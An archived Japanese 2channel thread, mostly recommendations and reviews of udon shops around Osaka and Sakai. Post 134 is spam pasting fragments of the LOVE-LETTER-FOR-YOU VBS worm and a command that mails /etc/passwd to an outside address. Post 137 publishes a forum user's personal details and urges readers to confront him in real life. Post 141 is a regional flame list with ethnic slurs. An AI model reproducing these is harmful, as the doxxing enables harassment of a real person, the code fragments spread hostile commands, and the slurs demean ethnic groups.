こういうとこで聞いたほうがコアな情報入るカナと思って立ててしまいました

10 名無しさん@お腹いっぱい。  2005/09/06(火) 23:39:32 ID:ZoSv784O
すんません
でいし厨ってわかりません
まあそれはいいとして
というか、自分もネットで大阪氏ねとか言ってるんですけどね
うどんも年に1回食べるか食べないかだし
ただ、急に無性に食べたくなったんです
有名店も行こうとは思うのですが、玄人好みの店にも行けたらいいなーと思いました



おまえら、嫌阪厨の基地外が立てたスレにカキコするなよ・・・

127 :名無しさん@お腹いっぱい。:2006/05/13(土) 20:57:22 ID:qH5qL6XQ
旭区の蔵十ってどう?
味が落ちたという情報もあったけど、本当のところはどうなってんだろ?

128 :名無しさん@お腹いっぱい。:2006/05/14(日) 06:18:17 ID:W9/m28T3
↑多分、その近くにある
土居の恩地うどんはどうよ?
土日や平日の夕方は絶対閉まってるから、喰いに行くのはかなりシビアだが。

129 :名無しさん@お腹いっぱい。:2006/05/14(日) 16:02:06 ID:fbPSCYwg
守口の京阪滝井駅の近くにある「踊るうどん」はおいしかった。
生醤油がおすすめ。

130 :名無しさん@お腹いっぱい。:2006/05/15(月) 18:38:49 ID:wBSCO4W6
わざと書いてるんだろうか・・・
ここ嫌大阪の基地外が立てたスレだよ
わざわざこんなとこで情報交換しなくてもいいと思うんだけどね


131 :名無しさん@お腹いっぱい。:2006/05/16(火) 12:45:12 ID:pFMgd6F4
堺市は中区内に美味い店が多い。

132 :名無しさん@お腹いっぱい。:2006/05/17(水) 19:29:41 ID:W+WxfhdQ
地下鉄心斎橋から近くの商店街にあるうどん屋は今まで食べたうどんの中で一番美味かったわ。近くにブックオフとか回転寿司とかあったわ。一杯650円の肉うどんは高いけどめちゃめちゃ美味かった

133 :名無しさん@お腹いっぱい。:2006/05/18(木) 23:41:17 ID:CiaamDj3
>>123
>125の言っている隆慎は確か4時まで開いてる。

堺市街のホウなら卸売り市場魚市場の中にある香川うどんが22-9まで開いてる。
あと一条通り香川うどんも時間は忘れたが遅くまで開いてる。

134 :名無しさん@お腹いっぱい。:2006/05/19(金) 09:58:05 ID:Ws3hHoSQ
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"



135 :名無しさん@お腹いっぱい。:2006/05/19(金) 12:49:46 ID:Ws3hHoSQ
関西人はバカしかいないからw
こんな関西大阪死ねスレでも喜んで書き込むんだよ
ほっとけばいいじゃんwwwww

136 :名無しさん@お腹いっぱい。:2006/05/19(金) 20:16:54 ID:sE9EvOi+
のらやに行ってみました。でも定職で924円は高いと思うなあ。
たぶん、もう行かないと思う。


137 :名無しさん@お腹いっぱい。:2006/05/23(火) 00:04:48 ID:mJ+wUrfZ
大阪府和泉市在住 おーやん(ブラックバス太郎)◆GPDV33Rihoが自分で晒した個人情報

年齢40〜45歳
2004年12月中旬 10年以上前(1995年あたりに買った)に光明池近辺の分譲マンションを売却
2005年2月初旬 和泉中央より山手の賃貸マンションに引越し
マンション購入価格4000万弱 売却価格1500万前後
5年前に嫁に逃げられ子供と一緒に捨てられる
子供は小学生の娘2人息子1人
そのうち2人は泉北の竹山産婦人科にて誕生
子供は南池田小学校(推定) でなければ南池田または光明台南→転校→緑ヶ丘または青葉はつが野あたり
元嫁は日南出身、日南に居る義理の甥っ子も失業
鬼塚ちひろに御執心
仕事は自営業
女鹿坂の三輪歯科にこだわり
創価学会・在日韓国朝鮮人が嫌い
サンエー・マンダイによく現れる

ご存知の方はリアルで
「お前、おーやん(ブラックバス太郎)だろ」
と、声をかけてあげてください。

138 :名無しさん@お腹いっぱい。:2006/05/23(火) 20:39:27 ID:+Y7Dpo09
糞スレ終了

139 :名無しさん@お腹いっぱい。:2006/05/26(金) 23:22:22 ID:RhubhVHT
◆粘着■まちを追われそうなブバカ太郎■ネバネバ◆
http://ex9.2ch.net/test/read.cgi/net/1148614306/l50

◆GPDV33Rihoウゼーって人は見に来てくれ

140 :名無しさん@お腹いっぱい。:2006/05/30(火) 02:50:40 ID:8DvwhNyy
>>123
方違神社近くの「ぶんぶく」ってとこは2時か3時位まで開いてるよ

141 :名無しさん@お腹いっぱい。:2006/05/30(火) 06:15:40 ID:ilK6ziji
●●●●2ch名物・東京人(笑)の13か条●●●●

@「東京ではこうなんだけど・・」とわざわざ自分の文化を押し付ける(中華思想)。
A自分の地域をマンセーして、他地方への下品な罵倒(朝鮮人気質)。

B関西に朝鮮人が多いことには敏感だが、東京に三国人(朝鮮人+中国人)が断トツ多いのには触れない。

C大阪を一日24時間、異常なまでに意識する。
D東京ご自慢のキモヲタ文化を批判してあげると火病を起こす。
Eあらゆる統計で東京の民度が最悪である事が証明されているのに、それを認めようとしない。
F「反省」という言葉を知らない。
Gその民度の低さを反映してか、ネットマナーがゼロ(東京人逮捕者が断トツに多い)。
Hそもそも東京は犯罪の無い「地上の楽園」と思っている。
I東京東部の犯罪は千葉人、東京北部の犯罪は埼玉人、東京西南部の犯罪は神奈川人のせいにする。
J都合が悪くなると、論点を摩り替えて地方をひたすら罵倒。
K地方が叩かれてもスルーだが、東京が叩かれると「分断工作員」と喚く。
Lソースすら出せず、妄想だけで地方を語る(成りすましもよくやる)。



142 :名無しさん@お腹いっぱい。:2006/06/02(金) 01:28:47 ID:MwzFF0oB
幸喜心はなかなか美味いよ。
料理がめんどい時はついつい出前を取る。

143 :名無しさん@お腹いっぱい。:2006/06/06(火) 18:48:20 ID:LKuCB0V0
滝井の踊るうどんほど最悪な店はなかった。
うどん自体は普通だが店主が最悪!
客が嫌がっているのにずっと話しかけてくる。
店主自身もこっちが答えたくなさそうにしてるのをわかってて、
食べている最中も客が嫌がってる話題を話しかけてくる。
飲食店でこんな不愉快な思いをしたのは初めてだ。

144 :名無しさん@お腹いっぱい。:2006/06/11(日) 09:56:20 ID:Kpwsqprz
>>1
住吉区遠里小野5丁目に有る
フードセンター・カヤ
http://map.yahoo.co.jp/pl?nl=34.35.51.141&el=135.29.54.883&la=1&fi=1&sc=3
は、美味しいです(近隣に住んでいて2人前以上買えば出前もしてくれるし)。
お米の販売もしていて10kg3800ぐらいで
つきたての旨米も買えます(モチモチしていて艶やかで甘味も有って旨い!!。
手製の揚げ物(揚げたてのみ)も買えますよ(鶏唐8個¥250-.とんかつ1枚¥380-.、
手作りハンバーグ大サイズ1枚¥380-.など多種あります)。
 お好み焼きも1枚(大きいサイズです)¥400−で、焼き立てを買えます。
名物の味が多い店です。
  夜9時頃まで開いているし御薦めします。

   ☆
        / ̄|   ☆
       |  |彡   ビシィ
       |  |                  / ̄ ̄ ̄ ̄ ̄ ̄
      ,―    \                |
     | ___)   |              ∠  Good Job!
     | ___)   |       ∧__∧   \______
     | ___)   |\___(´・ω・`  )_____
     ヽ__)_/ \___     _____, )__
         〃  .       /    /     / /    〃⌒i
         |          /    ./     / /    .i::::::::::i
   ____|     /⌒\./    /     / | ____|;;;;;;;;;;;i
  [__]___|    / /-、 .\_.  /     Uし'[_]     .|
   | ||     |    / /i  i    /         | ||      |
   | ||____|____/ / .| .|\_ノ______..| ||      |
   |(_____ノ /_| |_________..| ||      |
   | LLLLLL./ __)L_| |LLLLLLLLLLLLLLLL. | ||_____」
   | ||    (_/   / i                .| ||    | ||
   |_||        / .ノ               |_||    |_||
            (_/



145 :名無しさん@お腹いっぱい。:2006/06/13(火) 15:51:04 ID:kuRdeCRY
>>143
俺が行った時は無口だったが、キャラを変えたのかな。
それでももう行きたくは無い店ではあったが。

最近できたうどん屋の人って、どこか傲慢なところが見え隠れしてるから嫌いだ。
機械打ちなのに手打ちを語ってるしな。

146 :名無しさん@お腹いっぱい。:2006/06/15(木) 02:16:07 ID:HCoIcwHw
イヤなら反応するなよとしか言いようが無い

無視はし辛いとか偽善者ぶるなよ

147 :名無しさん@お腹いっぱい。:2006/06/17(土) 00:46:28 ID:974mD6iG
住道の宿六という店はマジで美味いよ! 大盛りも値段変わらず!

148 :名無しさん@お腹いっぱい。:2006/06/18(日) 18:24:55 ID:wulmGlcI
美味いざるうどんが食べられる店ないかな?
うどんは太め(細うどんは嫌)で、小麦の匂いがプンプンするようなのがいい。


149 :名無しさん@お腹いっぱい。:2006/06/19(月) 16:52:13 ID:rbvAuJuM
>>148
内麦100%ならプンプン漂うだろうケド…
そんなリスキーなうどんを出す店はあんまりないなぁ。



150 :名無しさん@お腹いっぱい。:2006/06/20(火) 01:24:59 ID:sqYWI4gu
堺にある津の勢って知ってる?うちの母親がよく行くらしいんだけどおいしいらしいよ。知ってる人詳細キボン

151 :名無しさん@お腹いっぱい。:2006/06/20(火) 18:21:46 ID:AO90qoZC
津の瀬って、美原にあるやつか?

152 :名無しさん@お腹いっぱい。:2006/06/21(水) 01:24:01 ID:T+EF8nYH
そうかも!美原?かなぁ。知ってるの?昼間はすごく混んでるらしい。うまいの?

153 :名無しさん@お腹いっぱい。:2006/06/21(水) 18:43:14 ID:Ux9kjxST
昔近所に住んでたから、店が建つまでの話とか大体聞いてる。

和食系うどんファミリーレストランて感じ。
店の雰囲気はいいし、従業員もよく教育されてる。
値段はやや高いめかな。

…だけど味は、まぁ、なんだ。
うどんが主力の店ではないとは思ったナ。

154 :名無しさん@お腹いっぱい。:2006/06/21(水) 23:27:17 ID:T+EF8nYH
へぇ〜母親達はおいしいと評判だと言ってたょ!高級車がよく並んでいて。味の通が行く店だと聞いた。近々行ってみます。

155 :もぐもぐ名無しさん:2006/06/21(水) 23:52:54 ID:cBA7f9Qy
>148
豊中市の庄内においしいうどん屋さんがあるよ。
小麦粉ぷんぷんではないけど、太めのうどんですごくコシがある。
店主が自分で手打ちしてる店。
知りたかったら詳しく書くよ。

156 :名無しさん@お腹いっぱい。:2006/06/22(木) 00:10:13 ID:JXj25KVo
ウマイナ 一人芝居 ツノセ

157 :名無しさん@お腹いっぱい。:2006/06/22(木) 02:01:28 ID:b/FkbzoO
津の瀬ごときでここまで引っ張るのもナンだが、一つ言っとく。

ざるを頼んだら2分で出てきた。




あの辺ならさつき野の百人の方がまだマシ。
自家製麺でく、細目だがけっこうコシがあった。

ちょっと遠いが羽曳野の釜竹は老舗。
最近東京に店を出したそうだが…

158 :148:2006/06/23(金) 21:42:09 ID:/Hvas8M4
>>155
知りたい!知りたい!尼崎在住だから近いし。教えてくれ。

159 :もぐもぐ名無しさん:2006/06/24(土) 00:39:46 ID:mh/CKDKM
阪急庄内駅の豊南市場の逆側に降りる。
梅田寄りに歩くと、商店街がある。そこではなく、まだ梅田に
向かって進むと次の商店街がある。
その商店街をひたすらまっすぐ歩き、突き当たりまで行く。
商店街の終わりを左に曲がるとうどん屋さんがある。
「えん」という店。
オススメは釜揚げやザル、ぶっかけ。
月曜が定休。11時から20時まで。
気が向いたら行ってみて。

160 :名無しさん@お腹いっぱい。:2006/06/24(土) 19:32:30 ID:0UvlxMCl
やっぱり力餅(玉出)のカレーうどんやな。

161 :名無しさん@お腹いっぱい。:2006/06/25(日) 02:54:13 ID:u4Rw0H6L
カレーうどんて流行ってるのか?

162 :名無しさん@お腹いっぱい。:2006/06/25(日) 10:49:15 ID:mVwI13xP
京橋とか福島にあるはがくれは梅田はがくれとは全然関係ないんかな?

163 :名無しさん@お腹いっぱい。:2006/06/25(日) 16:17:03 ID:rLyQOR7o
京橋は知らんけど、福島はもろ支店でしょう。ちなみに本店は岸和田。
福島なら力餅のカレーうどんの方が絶対にうまい。

164 :名無しさん@お腹いっぱい。:2006/06/26(月) 21:57:45 ID:vjMs1PIf
『梅田はがくれ本店』は単独の店で会社名も『梅田はがくれ』だよ。
本店とかついてるので紛らわしいが展開はしてない。

岸和田のはがくれとは別経営で無関係。
と、HPで断言してる。


知らないヤツはモグリ。

165 :名無しさん@お腹いっぱい。:2006/06/27(火) 00:26:09 ID:QS2js/pK
福島は?

166 :名無しさん@お腹いっぱい。:2006/06/27(火) 11:44:24 ID:0seTtf3o
福島も西宮も、展開じゃないでしょ。

167 :名無しさん@お腹いっぱい。:2006/06/28(水) 16:48:54 ID:r6EQdlVB
福島店が梅田の「はがくれ」から暖簾わけされたが、
その後、福島のはがくれが勝手に支店を増殖させた。

以後、梅田のはがくれは屋号を「梅田はがくれ」に変え
現在に至る。梅田はがくれの支店は道頓堀なんとか座のみ

だと思う。

168 :名無しさん@お腹いっぱい。:2006/06/29(木) 14:47:17 ID:xgEeSGRq
        /       _,,,...  ヽ;:  /""ヽ    ヽ
   /         ;'"  "\ l /;:;;:::-'''ヽ,   i   
  /         /,,--:-'''''"~:::::::::::::::::::::::::::ヽ,   .|
 /        /;:;;:::'''::::::::::::::::::::::::::::::::::::::::ヽ  ヽ
 |         |::::::::::::::::::::::::::::::::::::::::::::::::::::::::ヽ  | 
/        ;/   :::::::::::、::::::::::::::::::::::::::::::;/ ヽ  i, 
/        ;:;:ヽ   ::::::::\::::::::::::::::::::::::/   ヽ  i, 
i          / )(   ::::\;;::::::::::::;/ ,,-'''ヽヽ ヽ  
|          |  ⌒ ,;''"'''-;,_ \l,::,l/ !" ●) |  | 
|          |.   ( ●   >>><< `"''''''  |  | 
|         ;:|     "''''''''""^     \   |  |
|         ヽ.        ゝ( ,-、 ,:‐、)  |  |
 |       /ヾ..       /   ,--'""ヽ  |  |             ___,,,:--'''''"
 |          |       .//二二ノ""^ソ   |  |    _,,,..::---'''""""~~
..  |        `、ヽ     ヘ`\┼┼┼ ,!ヽ --==ニニ二,    キム汚です!よろしくがいねぇや!!
   |         ヽ\     \"ヽ-;:,,,,,,ノ /  / |     "`''''''-----:;,,,,,,,,,_______,,,,,,
   |          l  `ー、_   \,,,,,__,,,ノ /ヽ./
   ヽ.        :人    ヽ-、  ∴∵  / |ヽl
   /;:;:;:;;:;:;: _/  `ー-、    "'====---''",.-'" \ー---
      ,.-'"  \:      \      .,.-''"     |
    /.     \        ~>、,.-''"      |
,,..-‐'''""        ヾ    ,.-''"|    /――――、/


  ↑立候補して気合がはいるMr・Windows 98こと金沢キム汚氏w



169 :名無しさん@お腹いっぱい。:2006/06/29(木) 17:30:30 ID:DOmDiqPj
住道 宿六 美味い

170 :148:2006/06/30(金) 18:50:12 ID:CwQgNnz/
>>159
先日行って来たよ、えん。
では感想を正直に書きます。
良かった点
・薬味がわさび(おろし生姜で食べるのは好きでないから)
・細かい天カス(食べやすいようにできてる)
・うどんの表面がみずみずしい

改良して欲しいと思う点
・まだまだうどんが細い。もっと太くして欲しい
・小麦の匂いがほとんどしない
・つけダシの味が薄く、匂いも弱いので全体に物足りない

実際に食べてこんな風に思いました。気を悪くしたらごめんね。


171 :159:2006/07/01(土) 00:36:44 ID:wrTW9aH7
>170
人の好みは色々なので、気にしませんよ。
しかし、あの麺で細いとは驚いたー
まー出汁は確かに弱いね。

172 :148:2006/07/01(土) 02:19:23 ID:xrkjfiGv
>>171
実は帰りに服部の銭形といううどん屋にも寄って、ざるうどんを
食べてみたのですが、その店くらいの太さが自分の理想です。
味もまずまずだったので、もしご存じなければ行ってみてください。
薬味がおろし生姜なのは気に入りませんが、うどんそのものはダシを
つけずにそのまま食べてもおいしいです。


173 :名無しさん@お腹いっぱい。:2006/07/02(日) 20:18:30 ID:xh2S9/Kx
先日銭形に行ったが、大根おろしが辛すぎて出汁の味とかがわからなかった。

174 :名無しさん@お腹いっぱい。:2006/07/03(月) 22:57:43 ID:XGwUa+OZ
本町9号館の「麦清」は、激馬。
お昼いつも行列の出きる南本町「憩屋」は激マズ、行列の意味不明

175 :名無しさん@お腹いっぱい。:2006/07/04(火) 00:39:22 ID:RZAGT0jb
行列なんてそんなものさ

176 :名無しさん@お腹いっぱい。:2006/07/07(金) 13:10:46 ID:J0Qlya8H
評価の高い谷九の「皐月庵」のカレーうどん
俺はぜんぜんだめだ。スパイスがとげとげしい。
旨味がない。店主の態度も鼻持ちならん。高人気がわからん。

R163沿い門真の「饂飩蔵」 ここもだめだ。
温物しか食べてないが、汁が甘過ぎる。天麩羅等の具は旨いが。
店主は最高に嫌味くさい。麺と汁がだめ。
5年間、近所に住んでたが、2回でこりた。

推薦は茨木「唐庵」 ここは温物より冷物がいい
もしくはカレー おでんは並

梅田「はがくれ」 ここは生醤油がマスト 温より冷

心斎橋「川福」麺はたいしたことないが、お汁が最高
ここは温物プラスかきあげがベスト 出し巻き おでん も
お薦め。 

177 :名無しさん@お腹いっぱい。:2006/07/07(金) 14:12:11 ID:gLupkIuA
概出かもしれませんが東心斎橋「かわふく」さんがなかなかです。うどんももちろん良いのですがサイドメニューもなかなか、明太子ダシ巻きが絶品

178 :名無しさん@お腹いっぱい。:2006/07/09(日) 07:32:01 ID:vpqm9Wl7
長居の一心おいしーぞ

179 :名無しさん@お腹いっぱい。:2006/07/10(月) 02:53:42 ID:CdPG/M4n
JR環状線の福島駅を降りて右方向、徒歩数分にある立ち食いのうどん屋はうまい。
おばちゃんは愛想がいいとはいえないが、早い・安い・うまい。←○野屋のキャッチコピー?
かきあげがうまい。駅近なのに、昼時でも並ばなくて入れる。

180 :名無しさん@お腹いっぱい。:2006/07/12(水) 21:22:07 ID:bDWcUVkO
本町の味萬ウマー

181 :名無しさん@お腹いっぱい。:2006/07/13(木) 02:29:56 ID:z3WVYbL7
一味来福の饂飩味は好みなんだけど営業時間が短すぎ
後、天ぷら類がないとあっさりしすぎて飽きる

近所への気配りしなきゃ駄目な立地だからしょうがないのかもしれませんが

182 :名無しさん@お腹いっぱい。:2006/07/15(土) 20:15:29 ID:0/rwCm/r
麦きりトクオカ初めて行ってきました。
おがた家の様にガッシリした饂飩ではなくコシはあるが硬すぎない歯ごたえに
饂飩ってこんな美味い物だったのかと再認識させられました。
かしわ天の味と値段にも驚きです。


183 :名無しさん@お腹いっぱい。:2006/07/16(日) 20:19:21 ID:oIHEjqk5
本町「味満」カレーうどん 馬〜、でも実はトジうどんファン!「麦清」冷はバリバリ
温のだしは○麺今市、南本町「憩家」確かに並ぶの馬鹿!量だけ

184 :名無しさん@お腹いっぱい。:2006/07/28(金) 22:55:32 ID:SspmBFGs
堺筋本町にある「手打ちうどんの郷 四国路」美味しいよ!


185 :名無しさん@お腹いっぱい。:2006/08/06(日) 15:36:31 ID:Con928vz
梅田の「はがくれ」は普通に旨い。無難にお勧めできる感じ、目新しさは無いけど。

あとは交野市(になるんかな?)にある浄水場らへんにある「楽々」って店が独特な食感のうどんで楽しめた。
グミっぽい感じ?これは好みが別れるだろうけど試したい人は行って見れ。
結構前に行ったっきりだからまだやってるかどうか判らないけど。営業時間が滅茶苦茶短かった記憶があるんで要注意

186 :名無しさん@お腹いっぱい。:2006/08/07(月) 12:46:52 ID:3O+N5urY
はがくれ・・・ああいうのを美味いっていうのかな?
なんか味が印象に残らないし、一気に食べたって感じでもないし。

もう一度、食べにいってみます。

187 :名無しさん@お腹いっぱい。:2006/08/07(月) 21:26:45 ID:OPF2Yf0c
はがくれは普通くらいだと思う。可もなく不可もなく。
ゆきの、ミソノ、更級、今井とかのほうが美味い。

188 :名無しさん@お腹いっぱい。:2006/08/10(木) 17:55:26 ID:3eDFErOV
今日、初めてはがくれで食べてきたよ。
でも普通だった。
生しょうゆうどんの定食で800円は高すぎ。
第一ビル、たかはたのかやく定食が美味い。

189 :名無しさん@お腹いっぱい。:2006/08/10(木) 19:57:57 ID:2fPn1IID
はがくれは、麺がさぬきのコシでいいんだが、
つゆもさぬきの荒っぽい味なので、途中でつらくなってくる。

190 :名無しさん@お腹いっぱい。:2006/08/12(土) 00:53:02 ID:xk4NioHu
>>188
はがくれレベルは関東・地方に行けば何軒もあるけど
残念ながら関西では・・・ですな
800円は確かに高いよ
CPで言うと、たかはたに軍配があがるね
自分も仕事場が近いので昼食ローテに組み込んでます

四国屋は問題外
あの行列は、行列が人を呼んでいるようなもん
舌は確かかおまえら?って
いつも横を通るとき思う

191 :名無しさん@お腹いっぱい。:2006/08/12(土) 08:49:29 ID:Is6oLc4r
はがくれのようなカツオ系の下品なだしは関東や地方では通用するが、
関西では昆布系のだしでないと通用しない。


192 :名無しさん@お腹いっぱい。:2006/08/19(土) 19:09:35 ID:u5u5DRrE
羽曳野の釜竹は絶品!
メニューは釜あげとざるの2品だけで、行ったら必ず両方を食べます。
まずはざる。つやつや光る細めの麺をつるつるっとたいらげる。次に運ばれてくるコシのきいた釜あげには、、生姜・天かす・七味を少々とネギをたっぷり入れて、づるづるっとだしまで飲みつくす。
最高です!

193 :名無しさん@お腹いっぱい。:2006/08/19(土) 23:53:41 ID:lw8+U/rR
まぁ、あの値段で不味けりゃ問題だろ。
そこまでベタ褒めするほどのものでもないがな。


根津に店を出した頃、味が落ちたので俺はもう行ってない。

194 :名無しさん@お腹いっぱい。:2006/08/20(日) 00:06:18 ID:u5u5DRrE
>193はどこの店のことをいってるの?

195 :名無しさん@お腹いっぱい。:2006/08/20(日) 02:47:27 ID:RgPD6ipA
流れを嫁

196 :名無しさん@お腹いっぱい。:2006/08/20(日) 03:33:19 ID:RgPD6ipA
明石市の一味来福の店主が退店されるそうです。
お弟子さんが後を引き継ぐそうですが味が変わるかも知れないので
早めに食べに行こうと思ってます。

197 :神落:2006/08/24(木) 22:25:16 ID:QJjgpqNL
個人的には、ゆきのが大阪で一番美味い

198 :名無しさん@お腹いっぱい。:2006/08/25(金) 09:00:19 ID:fuIjvaC+
>197

何件回っての結論?

199 :名無しさん@お腹いっぱい。:2006/08/25(金) 20:55:50 ID:+2QFcAZY
南船場の松葉家って今でもある?電話番号調べたら掲載が消えてたから不安になって‥

200 :神落:2006/08/26(土) 01:49:31 ID:mMlnAfBQ
何軒とは言えんが…
まぁ、二、三十年の経験という事にしといてくれ

201 :名無しさん@お腹いっぱい。:2006/08/26(土) 03:36:38 ID:o9wX0XRf
土山の麦きりトクオカで梅ちくぶっかけを食べてきました。
この店は揚げ物は得意分野なのでちく天は満足。
ただ、梅の味と香りが大根おろしに消されてしまってたのが残念だ。
大根おろしを添えない状態で食べると梅と紫蘇の味と香りが引き立つだろう。

うどんが美味いので美味しく頂きましたけどね。

202 :名無しさん@お腹いっぱい。:2006/08/28(月) 01:21:27 ID:jjsBbzgN
>192
それわかるよっ!釜竹は旨いよなぁ
食べたくなってきたよ。

203 :名無しさん@お腹いっぱい。:2006/08/28(月) 20:11:34 ID:W+N7YSjy
先日、伊丹市の花火大会に行った際
ダイヤモンドシティ内のうどんの四国に入ってみました。
ワリと美味しかったんです。亭主と二人で
「おいしねえ〜おいしいねえ〜」言いながら食べましてね。
しかし、私の前に座ってたアベックのねえちゃん
うどん、残して「もうええわ あんた食べて」と彼氏に押し付けてた。
ちょとだけ悲しかった。

204 :名無しさん@お腹いっぱい。:2006/08/28(月) 20:16:20 ID:m3W9c9bb
がんばってるけど、フランチャイズ・チェーンですからね。

205 :名無しさん@お腹いっぱい。:2006/08/29(火) 00:46:24 ID:wYfcmdRV
フランチャイズだからダメってのは短絡だね。
程度が知れますよ。

206 :名無しさん@お腹いっぱい。:2006/08/29(火) 07:04:10 ID:cLSqRJvG
なら、旨いフランチャイズ教えろ。

207 :名無しさん@お腹いっぱい。:2006/08/29(火) 17:18:44 ID:2HzlRcBp
一味来福行ってきました。
釜揚げ注文して腹一杯堪能しました。
某掲示板で上がっていた店主退店の張り紙は
店外、店内には貼ってなかったのですが何か
進展あったのでしょうかね?

208 :名無しさん@お腹いっぱい。:2006/08/29(火) 18:06:19 ID:FDcgcL8L
既出だろうが、寺田町近く(北河堀)の「喜久三亭 川福」は好きだけどな。

「喜久三亭 川福の 麺 で、谷町九丁目「ふる里」の 出汁 なら最強だ。

ないか?この店の麺はいいんだが、あの店の出汁のほうが合うとか。


209 :名無しさん@お腹いっぱい。:2006/08/29(火) 20:24:21 ID:JRaAuSXG
9月に仙台から旅行に行くんだけど、
ここだけは絶対行っておけ!ってお店キボン
宿は梅田。

210 :名無しさん@お腹いっぱい。:2006/08/29(火) 20:53:05 ID:3fs6N6Tc
門真の更科

211 :名無しさん@お腹いっぱい。:2006/08/29(火) 21:21:08 ID:H4uZDJVN
>>209
道頓堀の今井かな…
梅田からも近いし

212 :名無しさん@お腹いっぱい。:2006/08/30(水) 02:05:55 ID:OOSpkR0J
はがくれはやめとけ。普通で期待はずれだから。

213 :名無しさん@お腹いっぱい。:2006/08/30(水) 22:25:25 ID:/st7NRuG
門真といえば、最近古川橋に出来た店旨かったぞ。
名前・・なんだっけ。まねきねこのビルのとこ。


214 :名無しさん@お腹いっぱい。:2006/08/31(木) 01:26:03 ID:gGK0vGzV
>>209
有名店代表ではがくれ、松葉屋あたりかな。
俺は食ったことが無いから何ともいえないが、話のネタにはなるだろ。

次点候補がうどん棒、かな泉、麺次郎あたりが梅田から近い。
も少し足を延ばせばいろいろあるだろうけどね。

>>213
きぬ川?
一度行ってみたいなァ。

215 :名無しさん@お腹いっぱい。:2006/08/31(木) 20:23:28 ID:qAZJaNty
かな泉は、讃岐うどんの出店なので、出汁に難アリ。

216 :名無しさん@お腹いっぱい。:2006/09/01(金) 06:51:03 ID:XptcEJHC
大阪饂飩ならまずは道頓堀今井しかありえない。
せっかく大阪に来たんだから讃岐饂飩ってよりも、大阪饂飩を食べたほうが良いと思う。

217 :名無しさん@お腹いっぱい。:2006/09/01(金) 14:30:39 ID:PIHTmirq
>>209です
店が多くてどこにしようか迷ってたのでレス有難いです。

218 :名無しさん@お腹いっぱい。:2006/09/01(金) 21:51:24 ID:UtBvRzZl
>>213
そのお店だ、古川橋のとこ。
行ったらお客さん少なかったけど久々にいいもん食った気がした。
地道に頑張って欲しいと思う。きっと名店になると思う。


219 :名無しさん@お腹いっぱい。:2006/09/02(土) 03:24:13 ID:o5stTcIN
うまいうどんと言えば、門真のうどんくら(漢字わからん…)でしょ!ひさびさに食べたいなぁー

220 :名無しさん@お腹いっぱい。:2006/09/02(土) 05:26:46 ID:mtCapvTD
>>213
>>218
「きぬ川」昨日から夜の営業も始めました
http://server2.petat.com/users/mousan-1/index.html


221 :名無しさん@お腹いっぱい。:2006/09/03(日) 00:49:22 ID:429RMhMF
>>220
工作員乙

宣伝だけは上手いな

222 :名無しさん@お腹いっぱい。:2006/09/03(日) 02:00:21 ID:ikY3BtMz
八尾の一忠の釜揚げ饂飩は美味しい。

223 :名無しさん@お腹いっぱい。:2006/09/03(日) 02:32:00 ID:+sXEXRJD
釜揚げうどんって飽きないですか?


224 :名無しさん@お腹いっぱい。:2006/09/03(日) 11:49:19 ID:RDBbHUc7
福島区のやとうで釜玉うどんを食ってきた。
卵かけごはんをうどんにしたようなものだった。
まあまあ美味いけど、金払ってわざわざ店に食べに行く程の
モノでもない、というのが正直な感想。


225 :名無しさん@お腹いっぱい。:2006/09/03(日) 16:29:38 ID:BMhTZZ8q
>>220
もうええって さっさとつぶれろぼけ!!

226 :名無しさん@お腹いっぱい。:2006/09/03(日) 18:17:09 ID:MKcNyJQy
hai

227 :名無しさん@お腹いっぱい。:2006/09/03(日) 20:37:51 ID:SwWSo35I
枚方の釜盛。なんであんなに流行ってんのかわからん。名前だけで人群れとんねやな。いっちょうの方が格段に旨いのに。

228 :名無しさん@お腹いっぱい。:2006/09/04(月) 04:29:28 ID:K0p/r8O2
いっちょうは夜しか営業してないから話しにならん

229 :名無しさん@お腹いっぱい。:2006/09/11(月) 10:17:46 ID:bDBqM4ee
美味しいうどん屋言うたら、やっぱり喜らくかなあ
昆布うどんとかやくご飯の、シンプルな定食が好きですねん
美味しいよ。テーブルに備え付けの壺付けも美味しい。

230 :名無しさん@お腹いっぱい。:2006/09/11(月) 15:23:20 ID:vWr33Qho
>>225
きぬ川で何があったの?

231 :ぱくぱく名無しさん:2006/09/11(月) 18:30:16 ID:gYWt4Ti8
うん、釜竹はおいしいお。
ご主人さんは、本当に職人だお。

232 :名無しさん@お腹いっぱい。:2006/09/12(火) 02:27:52 ID:v1z2wQo1
堺市の南部近辺の昼間やってるうどん屋でいいとこってある?

233 :名無しさん@お腹いっぱい。:2006/09/13(水) 14:25:03 ID:2bye285Z
セルフでどっか旨いとこ無いのかなあ
ちなみに長居公園の南の方にある讃岐うどんの店すっげぇまずかった

234 :名無しさん@お腹いっぱい。:2006/09/14(木) 00:31:37 ID:qDc1huEx
>>230
工作員だと思い込んでるみたい。

235 :名無しさん@お腹いっぱい。:2006/09/14(木) 00:33:44 ID:qDc1huEx
寝屋川の凡蔵、閉店したらしいんだが
誰か経緯を知らない?繁盛してたのに。
あのコシはよそでは食えない、残念。

236 :名無しさん@お腹いっぱい。:2006/09/14(木) 22:39:48 ID:qwEPaZRR
客は来てたみたいだから売り上げじゃないんだろうな。
一身上の都合ってやつじゃないのかな。


237 :名無しさん@お腹いっぱい。:2006/09/15(金) 03:53:02 ID:GrTzUoDO
>>235
俺も行ってがっかりしとこだぜ

238 :名無しさん@お腹いっぱい。:2006/09/15(金) 03:56:07 ID:GrTzUoDO
大阪うどんじゃなくて、本場にもまけないコシの讃岐うどんやって大阪にありますか?
神戸だったらすずめいくんだけど ぶっかけうまいとこ教えてくださいませ
大阪、讃岐うどん通様ー

239 :名無しさん@お腹いっぱい。:2006/09/15(金) 04:00:42 ID:GrTzUoDO
あ、ちなみにはがくれ、釜たけ、くらじゅーあたりによくいってます
うまいぶっかけぉくいたいぃぃぃーー
宜しくお願いしますーー

